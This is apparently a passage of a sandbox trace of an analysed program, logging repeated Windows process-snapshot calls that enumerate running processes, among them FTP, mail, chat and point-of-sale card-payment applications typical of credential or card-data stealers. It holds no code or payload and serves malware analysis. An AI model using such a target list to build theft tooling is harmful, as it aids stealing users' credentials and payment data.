szExeFile="backgroundTaskHost.exe")) returned 1 [0229.617] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0229.753] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0229.756] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0229.760] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0229.762] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0229.765] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0229.767] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0229.769] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0229.772] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0229.774] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0229.792] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0229.795] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0229.797] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0229.800] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0229.845] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0229.847] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0229.849] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0229.851] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0229.852] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0229.854] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0229.856] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0229.857] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0229.860] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0229.862] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0229.864] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0229.866] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0229.868] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0229.870] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0229.873] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0229.875] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0229.877] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0229.880] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0229.887] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0229.889] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0229.891] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0229.892] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0229.895] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0229.897] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0229.900] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0229.901] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0229.903] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0229.905] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0229.907] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0229.909] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0229.911] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0229.915] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0229.917] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0229.919] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0229.921] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0229.923] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0229.929] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0229.931] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0229.933] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0229.934] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0229.937] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0229.938] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0229.940] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0229.942] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0229.944] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0229.946] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0229.947] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0229.949] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0229.951] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0229.954] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0229.956] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0229.958] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0229.959] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0229.961] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0229.964] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0229.966] Process32Next (in: hSnapshot=0x2250, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0229.967] CloseHandle (hObject=0x2250) returned 1 [0229.967] Sleep (dwMilliseconds=0x64) [0230.075] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x223c [0230.090] Process32First (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.091] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0230.097] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0230.099] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.101] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0230.103] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.104] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0230.106] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0230.107] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0230.109] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.111] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.112] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0230.114] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.178] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.181] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 